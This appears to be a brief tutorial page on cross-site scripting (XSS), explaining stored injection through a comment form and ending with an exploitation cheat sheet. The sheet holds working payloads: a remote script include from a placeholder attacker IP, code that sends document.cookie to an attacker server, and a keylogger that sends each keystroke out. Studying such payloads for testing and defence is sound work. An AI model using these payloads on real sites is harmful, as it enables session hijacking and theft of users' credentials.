JavaScript injection (XSS)
What is it?
Commonly known as cross-site scripting (XSS), JavaScript injection is where an attacker can inject arbitrary JavaScript to be executed.
A simple example
A vulnerable webapp allows users to post comments.
When a user submits a comment, the website stores it and then displays it on the homepage without any validation or sanitization.
An attacker could exploit this by posting
<script>prompt(1)</script>
to the site.When a user visits the homepage, the payload is executed in that users browser.
Other learning resources:
Writeups:
Bullets
Checklist
Exploitation
alert(1)
prompt(1)
<script src="http://<our-ip>/script.js"></script>
let cookie = document.cookie
let encodedCookie = encodeURIComponent(cookie)
fetch("https://<your-web-server>/e?c=" + encodedCookie)
function logKey(event){
fetch("http://<your-web-server>/e?c=" + event.key)
}
document.addEventListener('keydown', logKey);
Last updated
Was this helpful?